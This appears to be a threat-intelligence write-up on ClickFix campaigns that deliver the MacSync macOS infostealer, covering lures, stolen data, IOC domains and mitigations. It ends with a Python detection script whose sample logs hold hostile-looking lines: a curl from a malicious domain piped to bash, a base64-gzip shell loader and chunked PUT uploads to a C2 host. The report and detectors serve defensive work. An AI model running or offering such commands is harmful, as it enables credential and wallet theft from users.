Executive Summary
Threat actors continue to refine the ClickFix technique — a pure social-engineering attack that tricks users into copying and pasting obfuscated terminal commands. What started as a Windows-focused tactic has now fully matured on macOS.
Sophos X-Ops tracked three distinct campaigns between November 2025 and February 2026 that deliver the MacSync information stealer. The latest February 2026 variant uses dynamic AppleScript payloads, in-memory execution, and a loader-as-a-service model for maximum evasion.
Delivery relies heavily on AI-themed lures (OpenAI Atlas browser, "how to clean up your Mac" ChatGPT threads) served via Google sponsored ads and legitimate hosting platforms (Cloudflare Pages, Squarespace, Tencent EdgeOne). Victims are typically developers and power users — exactly the demographic that already trusts curl | sh patterns.
No CVEs are involved. This is 100% user-interaction abuse.
Campaign Timeline & Lures
| Campaign | Timeframe | Lure Theme | Delivery Platform | Key Evolution |
|---|---|---|---|---|
| Campaign 1 | Nov 2025 | OpenAI Atlas browser | Google sponsored links → fake Google Sites | First macOS ClickFix wave |
| Campaign 2 | Dec 2025 | "Clean up your Mac" guides | Sponsored ChatGPT conversations → fake GitHub pages | Leverages legitimate OpenAI threads + real-time victim tracking |
| Campaign 3 | Feb 2026 | Apple site impersonation + dev tools | Cloudflare Pages, Squarespace, Tencent EdgeOne | Dynamic AppleScript + in-memory execution |
All campaigns impersonate legitimate macOS software or AI tools and use flattering language ("For experienced users…") to lower suspicion.
MacSync Infostealer Capabilities
MacSync is a classic credential and file stealer that has evolved across the three waves:
- Data harvested:
  - Chromium & Firefox browser profiles (cookies, autofill, history, logins, extensions)
  - Safari cookies, autofill, and Notes
  - macOS Keychain databases
  - SSH keys, AWS credentials, Kubernetes tokens
  - Desktop/Documents/Downloads files (especially crypto wallets, .key, .pem, .wallet)
  - Telegram Desktop data
  - Ledger Live / Ledger Wallet seed phrases (via app.asar patching + ad-hoc re-signing)
- Exfiltration: Packages everything into `/tmp/osalogging.zip` and uploads it in 10 MB chunks via PUT requests to C2 with session IDs. The ZIP is deleted post-upload.
- Persistence (Feb 2026 variant): Relaunches as a background daemon + multistage shell loader.
Tactics, Techniques & Procedures (TTPs)
Core ClickFix flow (all campaigns):
- Victim lands on fake landing page (via sponsored ad or ChatGPT redirect).
- Page displays step-by-step Terminal instructions (Spotlight → Terminal → paste command).
- Command is a heavily obfuscated `curl` that downloads a Bash/shell script.
- Script prompts for the system password, downloads the payload, and executes it (often redirecting I/O to `/dev/null`).
Additional TTPs observed:
- Use of legitimate platforms (ChatGPT shared conversations, Cloudflare Pages) to bypass reputation filters.
- Real-time victim tracking via `stats.php` endpoints and Telegram bots.
- User-Agent fingerprinting + Cloudflare protection on C2.
- February variant: Base64 + Gzip compressed shell loaders, API-key-gated C2, dynamic AppleScript payloads executed in memory.
- Evidence removal during execution.
MITRE ATT&CK mappings (inferred from observed behavior):
| Tactic | Technique |
|---|---|
| TA0001 Initial Access | T1566 Phishing (malvertising + fake sites) |
| TA0002 Execution | T1059.004 Unix Shell, T1204.002 User Execution |
| TA0003 Persistence | T1543.004 Launch Daemon (Feb variant) |
| TA0005 Defense Evasion | T1027 Obfuscated Files or Information, T1140 Deobfuscate/Decode, T1564.001 Hidden Files |
| TA0006 Credential Access | T1555.001 Keychain, T1552.004 Credentials in Files |
| TA0010 Exfiltration | T1041 Exfiltration Over C2 Channel (chunked uploads) |
Indicators of Compromise (IOCs)
Malicious Domains (all observed inactive at time of reporting)
get-mactech[.]com
getmaclab[.]com
getmacnow[.]com
imaclife[.]com
insta-macer[.]com
instmac[.]com
mac-faster[.]com
mac-fast[.]com
mac-space[.]com
macfixnow[.]com
mymachub[.]com
mymacsoft[.]com
jmpbowl[.]top
jmpbowl[.]xyz
Key URLs / Patterns
http[s]://[campaign-domain]/?sid=[tracking-id]
https://[campaign-domain]/app/
https://[campaign-domain]/app/stats.php (victim tracking)
http://jmpbowl[.](top|xyz)/curl/[SHA256-hash]
File Paths (on victim machines)
/tmp/osalogging.zip
/Applications/Ledger Wallet.app (tampered)
/Applications/Ledger Live.app (tampered)
Note: No file hashes were published in the public reports. All listed domains were registered between November and December 2025.
Detection & Mitigation Guidance
For organizations & individuals:
- Educate users: Never paste Terminal commands from untrusted web pages — even if the page looks legitimate.
- Monitor for unusual `curl` + `bash` or `osascript` executions.
- Enable Gatekeeper and XProtect (they were bypassed in these campaigns via user password entry).
- Use macOS endpoint protection with behavioral detection for Terminal abuse.
- Block known malicious domains at the proxy level (list above).
- For developers: Prefer Homebrew / official installers over random web "quick install" guides.
Enterprise recommendations:
- Deploy Jamf or similar MDM to block unsigned binaries and monitor LaunchDaemons.
- Monitor for outbound connections to the listed domains and `/stats.php` endpoints.
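The monitoring recommendations above and the IOC patterns listed earlier can be turned into straightforward detection logic. The following is an added example written for this summary, not Sophos X-Ops or Sophos product code: it checks process command lines for the observed execution chain (`curl` piped to a shell, inline `osascript`, Base64 + Gzip loaders, output redirected to `/dev/null`), checks proxied URLs against the domain list and the `/app/stats.php` and `/curl/[SHA256]` patterns, and groups PUT requests by session ID to surface the chunked upload behaviour. The log line formats, the `sid` query parameter as the session-ID carrier, and the sample telemetry are all constructed assumptions; the report published no file hashes, so the hash in the sample is a placeholder.

```python
"""Detection logic for the ClickFix / MacSync behaviours described above.

Added, illustrative example (not Sophos X-Ops or Sophos product code).
Log formats are constructed for this example; using a `sid` query
parameter as the session-ID carrier is an assumption, since the report
only states that uploads carry session IDs.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Domains from the report's IOC list (defanging removed so hosts can be compared).
BLOCKED_DOMAINS = {
    "get-mactech.com", "getmaclab.com", "getmacnow.com", "imaclife.com",
    "insta-macer.com", "instmac.com", "mac-faster.com", "mac-fast.com",
    "mac-space.com", "macfixnow.com", "mymachub.com", "mymacsoft.com",
    "jmpbowl.top", "jmpbowl.xyz",
}

# Command-line patterns matching the observed execution chain.
PROCESS_RULES = [
    ("curl_pipe_shell",   re.compile(r"\bcurl\b.*\|\s*(?:ba|z)?sh\b")),
    ("osascript_inline",  re.compile(r"\bosascript\b.*\s-e\s")),
    ("b64_gzip_loader",   re.compile(r"\bbase64\b.*\|\s*(?:gunzip|gzip\s+-d)\b.*\|\s*(?:ba|z)?sh\b")),
    ("output_to_devnull", re.compile(r"[12&]?>\s*/dev/null")),
]

# URL patterns from the "Key URLs / Patterns" section.
URL_RULES = [
    ("stats_endpoint",   re.compile(r"/app/stats\.php(?:\?|$)")),
    ("sha256_curl_path", re.compile(r"/curl/[0-9a-f]{64}(?:/|\?|$)")),
]


def analyse_process(cmdline):
    """Return the names of every process rule the command line matches."""
    return [name for name, rx in PROCESS_RULES if rx.search(cmdline)]


def analyse_url(url):
    """Return IOC hits for one requested URL: blocklisted host and/or path pattern."""
    hits = []
    if (urlsplit(url).hostname or "").lower() in BLOCKED_DOMAINS:
        hits.append("blocked_domain")
    hits.extend(name for name, rx in URL_RULES if rx.search(url))
    return hits


def find_chunked_uploads(proxy_events, min_puts=3, min_bytes=20 * 1024 * 1024):
    """Group PUTs by (host, sid) and flag bursts that look like chunked
    exfiltration: several PUTs sharing a session ID with a large combined
    size. Returns {(host, sid): (count, total_bytes)} for flagged sessions."""
    per_session = defaultdict(lambda: [0, 0])
    for ev in proxy_events:
        if ev["method"] != "PUT":
            continue
        parts = urlsplit(ev["url"])
        sid = parse_qs(parts.query).get("sid", ["<none>"])[0]
        per_session[(parts.hostname or "", sid)][0] += 1
        per_session[(parts.hostname or "", sid)][1] += ev["bytes"]
    return {k: tuple(v) for k, v in per_session.items()
            if v[0] >= min_puts and v[1] >= min_bytes}


# --- constructed sample telemetry (not real victim data) --------------------
PROC_LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")
PROXY_LINE = re.compile(r"^(?P<ts>\S+) (?P<user>\S+) (?P<method>[A-Z]+) (?P<url>\S+) (?P<bytes>\d+)$")

SAMPLE_PROCESS_LOG = """\
2026-02-10T09:11:58Z user=dev cmd=brew install jq
2026-02-10T09:12:03Z user=dev cmd=/bin/bash -c "curl -fsSL https://mac-space.com/app/ | bash" > /dev/null 2>&1
2026-02-10T09:12:09Z user=dev cmd=bash -c "echo H4sI... | base64 -d | gunzip | sh"
2026-02-10T09:12:14Z user=dev cmd=osascript -e 'do shell script "..."'
"""

SAMPLE_PROXY_LOG = """\
2026-02-10T09:12:04Z dev GET https://mac-space.com/app/stats.php?sid=a1b2c3 512
2026-02-10T09:12:05Z dev GET https://jmpbowl.xyz/curl/{h} 88321
2026-02-10T09:12:40Z dev PUT https://jmpbowl.xyz/app/upload?sid=a1b2c3 10485760
2026-02-10T09:12:52Z dev PUT https://jmpbowl.xyz/app/upload?sid=a1b2c3 10485760
2026-02-10T09:13:03Z dev PUT https://jmpbowl.xyz/app/upload?sid=a1b2c3 4194304
2026-02-10T09:13:10Z dev GET https://api.github.com/repos/example/repo 2048
""".format(h="a" * 64)  # placeholder hash: the report published no file hashes


def run_detections(process_log=SAMPLE_PROCESS_LOG, proxy_log=SAMPLE_PROXY_LOG):
    """Parse both logs and return every alert found, grouped by source."""
    alerts = {"process": [], "network": [], "exfil": []}
    for line in process_log.splitlines():
        m = PROC_LINE.match(line)
        if m and (hits := analyse_process(m["cmd"])):
            alerts["process"].append((m["ts"], m["user"], hits))
    events = []
    for line in proxy_log.splitlines():
        m = PROXY_LINE.match(line)
        if not m:
            continue
        events.append({"method": m["method"], "url": m["url"], "bytes": int(m["bytes"])})
        if hits := analyse_url(m["url"]):
            alerts["network"].append((m["ts"], m["user"], hits))
    alerts["exfil"] = list(find_chunked_uploads(events).items())
    return alerts


if __name__ == "__main__":
    for source, items in run_detections().items():
        for item in items:
            print(source, item)
```

The `curl_pipe_shell` and `output_to_devnull` rules will also fire on legitimate installer one-liners (Homebrew, rustup, nvm), which is exactly the point made in the report: treat them as triage signals to correlate with the network and exfil findings, and tune an allowlist of known installer hosts rather than suppressing the rules.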
Why This Matters
ClickFix/InstallFix is uniquely dangerous on macOS because the curl | sh pattern is a legitimate developer workflow (Homebrew, Rust, nvm, etc.). Threat actors are weaponizing trust in AI tools and ChatGPT at scale. With macOS market share growing in enterprise and the value of stolen SSH keys and crypto wallets, these campaigns will only accelerate.
The February 2026 variant's move to dynamic in-memory AppleScript shows the actors are actively iterating in response to detections.
Sources & Further Reading
- Sophos X-Ops: "Evil Evolution: ClickFix and macOS Infostealers" (March 2026)
- The Hacker News: "ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers" (March 16, 2026)